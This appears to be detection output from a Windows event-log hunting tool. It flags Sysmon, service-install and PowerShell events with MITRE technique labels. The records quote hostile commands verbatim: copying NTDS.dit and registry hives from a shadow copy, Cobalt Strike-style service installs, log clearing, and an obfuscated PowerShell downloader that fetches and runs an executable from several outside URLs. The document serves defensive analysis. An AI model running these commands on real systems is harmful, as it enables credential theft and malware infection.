Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-0020FF090500 + 0x509ff + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-D4A4-5D31-0000-0010DD6D0000 + 804 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch -p + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4135 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:50.383 + 747F3D96-DDB6-5D31-0000-0010273D4C00 + 3952 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-0020FF090500 + 0x509ff + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-D4A4-5D31-0000-0010DD6D0000 + 804 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch -p + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4135 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:50.383 + 747F3D96-DDB6-5D31-0000-0010273D4C00 + 3952 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-0020FF090500 + 0x509ff + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-D4A4-5D31-0000-0010DD6D0000 + 804 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch -p + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549087.258254,2019-07-19T19:11:27.258254+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4133 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:27.220 + 747F3D96-DD9F-5D31-0000-001041504B00 + 6508 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549087.233257,2019-07-19T19:11:27.233257+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4132 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:27.192 + 747F3D96-DD9F-5D31-0000-00102D4D4B00 + 976 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549087.202862,2019-07-19T19:11:27.202862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4131 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:27.156 + 747F3D96-DD9F-5D31-0000-00101A4A4B00 + 5772 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549087.169217,2019-07-19T19:11:27.169217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4130 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:27.069 + 747F3D96-DD9F-5D31-0000-00107B454B00 + 3344 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Service installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Audit,High,"Service installed in the system with Name ( WinPwnage ) , File Name ( %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe ) , Service Type ( user mode service ) , Service Start Type ( demand start ) , Service Account ( LocalSystem )",7045," + + + + + 7045 + 0 + 4 + 0 + 0 + 0x8080000000000000 + + + 10446 + + + + + System + IEWIN7 + + + + + WinPwnage + %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe + user mode service + demand start + LocalSystem + +",IEWIN7,System +cobalt strike service detected installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Threat,Critical,cobalt strike or meterpreter service detected installed in the system,7045," + + + + + 7045 + 0 + 4 + 0 + 0 + 0x8080000000000000 + + + 10446 + + + + + System + IEWIN7 + + + + + WinPwnage + %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe + user mode service + demand start + LocalSystem + +",IEWIN7,System +Service installed in the system,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,"Service installed in the system with Name ( remotesvc ) , File Name ( calc.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045," + + + + + 7045 + 0 + 4 + 0 + 0 + 0x8080000000000000 + + + 6045 + + + + + System + WIN-77LTAPHIQ1R.example.corp + + + + + remotesvc + calc.exe + user mode service + auto start + LocalSystem + +",WIN-77LTAPHIQ1R.example.corp,System +System Logs Cleared,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,System Logs Cleared,104," + + + + + 104 + 0 + 4 + 104 + 0 + 0x8000000000000000 + + + 27736 + + + + + System + PC01.example.corp + + + + + + user01 + EXAMPLE + System + + + +",PC01.example.corp,System +Service installed in the system,1551605354.168476,2019-03-03T13:29:14.168476+04:00,,Audit,High,"Service installed in the system with Name ( spoolsv ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045," + + + + + 7045 + 0 + 4 + 0 + 0 + 0x8080000000000000 + + + 4482 + + + + + System + WIN-77LTAPHIQ1R.example.corp + + + + + spoolsv + cmd.exe + user mode service + auto start + LocalSystem + +",WIN-77LTAPHIQ1R.example.corp,System +Service installed in the system,1551605038.85688,2019-03-03T13:23:58.856880+04:00,,Audit,High,"Service installed in the system with Name ( spoolfool ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045," + + + + + 7045 + 0 + 4 + 0 + 0 + 0x8080000000000000 + + + 4480 + + + + + System + WIN-77LTAPHIQ1R.example.corp + + + + + spoolfool + cmd.exe + user mode service + auto start + LocalSystem + +",WIN-77LTAPHIQ1R.example.corp,System +Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.34971,2020-08-26T09:09:33.349710+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Get-Item): "Get-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," + + + + + 800 + 0 + 4 + 8 + 0 + 0x80000000000000 + + + 789 + + + + + Windows PowerShell + DESKTOP-RIPCLIP + + + + + $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 + DetailTotal=1 + + SequenceNumber=27 + + UserId=DESKTOP-RIPCLIP\Clippy + HostName=ConsoleHost + HostVersion=5.1.19041.1 + HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 + HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + EngineVersion=5.1.19041.1 + RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 + PipelineId=6 + ScriptName= + CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Get-Item): "Get-Item" +ParameterBinding(Get-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe" + + + +",DESKTOP-RIPCLIP,Windows PowerShell +Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.11515,2020-08-26T09:09:29.115150+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (New-Object,Net.WebClient,Net.WebClient,New-Object,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,new-object,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Object): "New-Object") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," + + + + + 800 + 0 + 4 + 8 + 0 + 0x80000000000000 + + + 787 + + + + + Windows PowerShell + DESKTOP-RIPCLIP + + + + + $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 + DetailTotal=1 + + SequenceNumber=23 + + UserId=DESKTOP-RIPCLIP\Clippy + HostName=ConsoleHost + HostVersion=5.1.19041.1 + HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 + HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + EngineVersion=5.1.19041.1 + RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 + PipelineId=6 + ScriptName= + CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') 